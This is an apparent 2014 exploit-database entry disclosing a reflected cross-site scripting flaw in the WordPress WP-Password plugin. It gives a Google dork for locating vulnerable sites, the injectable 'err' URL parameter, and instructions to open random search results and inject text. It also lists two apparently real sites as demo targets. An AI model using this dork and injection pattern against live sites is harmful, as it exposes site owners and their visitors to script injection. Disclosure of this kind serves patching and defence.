WordPress WP-Password Plugin XSS Vulnerability

2014.02.16
Credit: Arash Cyber
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:\"/wp-content/plugins/wp-password/login.php\"

# WordPress WP-Password Plugin XSS Vulnerability ########################### [+] Author: Arash Cyber [+] Exploit Title: WordPress WP-Password Plugin XSS Vulnerability [+] Find: 2/15/2014 [+] Category: WebApp [+] Google Dork: inurl:"/wp-content/plugins/wp-password/login.php" [+] Tested On: Windows - Linux [+] Site: Attacker-Team.org ########################################### ########################################### # Type: XSS Vulnerability # Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text} # Explaination: Copy The Dork In Google - Open A Site - Delete All Texts After login.php Copy This Code At The End Of The Url: ?err={Your Text} - And End :D +Demo: -http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text -http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your Text ########################################### ########################################### Greets to: Offensive - Rooter - Hex - Hamoon Pars - Anonymous - Virangar - Saeed.Jok3r The Smith - MR.MOJTABA - D@ni - Gold___Hat - ArmiN_C - Alireza_rusher - Mahdi Smok Anti Security - Inj3ct0r - MR.BBC - SiR.Alone1993 - MR.J@N - mR.al!_kh@n_@zzam ########################################### ###########################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top